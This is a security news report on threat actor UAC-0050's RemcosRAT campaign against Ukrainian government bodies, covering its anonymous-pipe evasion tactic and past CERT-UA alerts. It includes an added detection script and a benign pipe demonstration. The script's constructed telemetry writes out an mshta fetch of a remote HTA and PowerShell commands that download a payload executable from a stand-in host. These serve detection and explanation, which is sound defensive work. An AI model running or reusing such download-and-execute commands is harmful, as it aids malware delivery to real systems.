A threat actor known for repeatedly targeting organizations in Ukraine with the RemcosRAT remote surveillance and control tool is at it again, this time with a new tactic for transferring data without triggering endpoint detection and response (EDR) systems.
The adversary, tracked as UAC-0050, is targeting Ukrainian government entities in its latest campaign. Researchers at Uptycs who observed it said the attacks may be politically motivated, with the goal of gathering specific intelligence from Ukrainian government agencies. "While the possibility of state sponsorship remains speculative, the group's activities pose an undeniable risk, especially to government sectors reliant on Windows systems," Uptycs researchers Karthickkumar Kathiresan and Shilpesh Trivedi wrote in a report this week.
The RemcosRAT Threat
Threat actors have been using RemcosRAT, which started life as a legitimate remote administration tool, to control compromised systems since at least 2016. Among other things, the tool lets attackers gather and exfiltrate system, user, and processor information. It can bypass many antivirus and endpoint threat detection tools and execute a variety of backdoor commands. In many instances threat actors have distributed the malware as attachments to phishing emails.
Uptycs has not yet been able to determine the initial attack vector in the latest campaign but said it is leaning toward job-themed phishing and spam emails as the most likely malware distribution method. The security vendor based its assessment on emails it reviewed that purported to offer targeted Ukrainian military personnel consultancy roles with the Israel Defense Forces.
The infection chain itself begins with a .lnk file that gathers information about the compromised system and then retrieves an HTML application (HTA) named 6.hta from an attacker-controlled remote server using a native Windows binary, Uptycs said. The retrieved HTA contains a PowerShell script that initiates steps to download two other payload files (word_update.exe and ofer.docx) from an attacker-controlled domain and, ultimately, to install RemcosRAT on the system.
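The chain described above maps directly onto process-creation telemetry, so here is an added example (my code, not Uptycs' detection logic or anything from the report) that walks parent/child relationships to find it: a PowerShell process that downloads something and descends from an mshta.exe launched with a URL. It assumes the unnamed native Windows binary was mshta.exe, the normal host for .hta files; the events and the 203.0.113.10 address (a documentation range) are constructed, not indicators from the campaign.

```python
"""Flag the .lnk -> HTA -> PowerShell -> download chain in process-creation events.

Added example, not Uptycs' detection logic. Assumes the unnamed native Windows
binary was mshta.exe; the events below are constructed and 203.0.113.10 is a
documentation address, not an indicator from the campaign.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable file name, lower-case
    cmdline: str


URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# PowerShell idioms that pull a payload over HTTP
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer|net\.webclient",
    re.IGNORECASE,
)

SAMPLE_EVENTS = [  # constructed telemetry, not real logs
    ProcEvent(100, 1, "explorer.exe", r"C:\Windows\explorer.exe"),
    # .lnk target: collect host details, then fetch the HTA with a native binary
    ProcEvent(200, 100, "cmd.exe",
              r"cmd.exe /c systeminfo > %TEMP%\si.txt & mshta http://203.0.113.10/6.hta"),
    ProcEvent(300, 200, "mshta.exe", "mshta.exe http://203.0.113.10/6.hta"),
    ProcEvent(400, 300, "powershell.exe",
              "powershell.exe -w hidden -c Invoke-WebRequest http://203.0.113.10/word_update.exe "
              r"-OutFile $env:TEMP\word_update.exe; Invoke-WebRequest http://203.0.113.10/ofer.docx "
              r"-OutFile $env:TEMP\ofer.docx"),
    ProcEvent(500, 400, "word_update.exe", r"C:\Users\u\AppData\Local\Temp\word_update.exe"),
    # benign noise that a naive "powershell downloads a file" rule would hit
    ProcEvent(600, 100, "powershell.exe", r"powershell.exe -File C:\Scripts\backup.ps1"),
    ProcEvent(700, 100, "mshta.exe", r"mshta.exe C:\Program Files\Vendor\help.hta"),
    ProcEvent(800, 100, "powershell.exe",
              "powershell.exe -c Invoke-WebRequest http://intranet.example/updates.json -OutFile u.json"),
]


def ancestry(index, pid, max_depth=8):
    """Return the event for pid followed by its ancestors, nearest first."""
    chain, seen = [], set()
    while pid in index and pid not in seen and len(chain) < max_depth:
        seen.add(pid)
        chain.append(index[pid])
        pid = index[pid].ppid
    return chain


def mshta_remote_launches(events):
    """Stage 1 indicator: mshta.exe handed a URL instead of a local .hta path."""
    return [e for e in events if e.image == "mshta.exe" and URL_RE.search(e.cmdline)]


def find_hta_download_chains(events):
    """Stage 2: PowerShell that downloads a payload and descends from a remote mshta."""
    index = {e.pid: e for e in events}
    findings = []
    for e in events:
        if e.image not in ("powershell.exe", "pwsh.exe") or not DOWNLOAD_RE.search(e.cmdline):
            continue
        chain = ancestry(index, e.pid)
        hta = next((a for a in chain[1:]
                    if a.image == "mshta.exe" and URL_RE.search(a.cmdline)), None)
        if hta is None:
            continue            # plain PowerShell download, no HTA ancestor: not this chain
        findings.append({
            "powershell_pid": e.pid,
            "hta_url": URL_RE.search(hta.cmdline).group(0),
            "payload_urls": URL_RE.findall(e.cmdline),
            "chain": [a.image for a in reversed(chain)],   # root first
        })
    return findings


if __name__ == "__main__":
    for f in find_hta_download_chains(SAMPLE_EVENTS):
        print(" -> ".join(f["chain"]), f["hta_url"], f["payload_urls"])
```

The ancestry walk is what keeps the benign PowerShell download (pid 800) out of the results; matching on the command line alone would page on every admin script that fetches a file. Real telemetry has process-ID reuse and missing parents, which is why the walk stops at unknown PIDs and caps its depth.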
A Somewhat Unusual Tactic
What makes UAC-0050's new campaign different is the threat actor's use of a Windows interprocess communication feature called anonymous pipes to transfer data on compromised systems. As Microsoft describes it, an anonymous pipe is a one-way communication channel for transferring data between a parent process and a child process. UAC-0050 is taking advantage of the feature to covertly channel data without triggering any EDR or antivirus alerts, Kathiresan and Trivedi said.
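To show what the tactic actually is, the following added example (not UAC-0050's code and not from the Uptycs report) moves a constructed blob of "host information" from a parent to a child process over an anonymous pipe, using Python's subprocess module, which creates exactly this kind of pipe for a child's stdin and stdout (CreatePipe on Windows, pipe(2) elsewhere). The host-info fields are invented stand-ins for whatever a recon stage collects.

```python
"""Hand data from a parent to a child over an anonymous pipe; nothing touches disk.

Added example, not malware code. subprocess.PIPE is an anonymous pipe on every
platform; the "host info" below is a constructed stand-in for recon output.
"""
import base64
import json
import os
import subprocess
import sys

# The child inherits only the read end of one pipe (its stdin) and the write end
# of another (its stdout). It reads until the parent closes the write end, then
# returns an encoded copy, the sort of staging a second-stage process performs.
CHILD_SRC = r"""
import base64, sys
blob = sys.stdin.buffer.read()
sys.stdout.buffer.write(base64.b64encode(blob))
"""


def collect_host_info():
    """Constructed recon output; real tooling would query the OS here."""
    return {"user": "u", "host": "WS-01", "os": sys.platform, "cpus": os.cpu_count()}


def hand_off_via_pipe(payload: bytes) -> bytes:
    """Write payload into the child's stdin pipe, close it, drain the child's stdout pipe."""
    child = subprocess.Popen(
        [sys.executable, "-c", CHILD_SRC],
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
    )
    out, _ = child.communicate(payload)   # write all, close write end, read until EOF
    return out


def round_trip(info: dict) -> bytes:
    """Serialize info, push it through the child, and decode what came back."""
    raw = json.dumps(info, sort_keys=True).encode()
    staged = hand_off_via_pipe(raw)
    return base64.b64decode(staged)


def pipe_is_one_way() -> bool:
    """A raw anonymous pipe has a read end and a write end; writing to the read end fails."""
    r, w = os.pipe()
    try:
        os.write(w, b"x")
        if os.read(r, 1) != b"x":
            return False
        try:
            os.write(r, b"y")        # wrong direction
            return False
        except OSError:
            return True
    finally:
        os.close(r)
        os.close(w)


if __name__ == "__main__":
    info = collect_host_info()
    print(round_trip(info) == json.dumps(info, sort_keys=True).encode())
    print("one-way:", pipe_is_one_way())
```

No file is written and no socket is opened, which is why file and network telemetry see nothing here. The channel is not invisible, though: Windows implements anonymous pipes as named pipes with a unique name, so pipe-creation telemetry such as Sysmon event ID 17 can still record them. The gap is in what rules alert on, not in what the kernel can observe.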
UAC-0050 is not the first threat actor to use pipes to move stolen data, but the tactic remains relatively uncommon, the Uptycs researchers noted. "Though not entirely new, this technique marks a significant leap in the sophistication of the group's strategies," they said.
This is far from the first time that security researchers have observed UAC-0050 attempting to distribute RemcosRAT to targets in Ukraine. On several occasions last year, Ukraine's Computer Emergency Response Team (CERT-UA) warned of campaigns by the threat actor to distribute the remote access Trojan to organizations in the country.
The most recent was an advisory on Dec. 21, 2023, about a mass phishing campaign involving emails with an attachment that purported to be a contract involving Kyivstar, one of Ukraine's largest telecommunications providers. Earlier in December, CERT-UA warned of another RemcosRAT mass distribution campaign, this one involving emails purporting to be about "judicial claims" and "debts" targeting organizations and individuals in Ukraine and Poland. The emails carried an attachment in the form of an archive file or RAR file.
CERT-UA issued similar alerts on three other occasions last year: one in November with court subpoena-themed emails serving as the initial delivery vehicle; another, also in November, with emails allegedly from Ukraine's security service; and the first in February 2023 about a mass email campaign with attachments that appeared to be associated with a district court in Kyiv.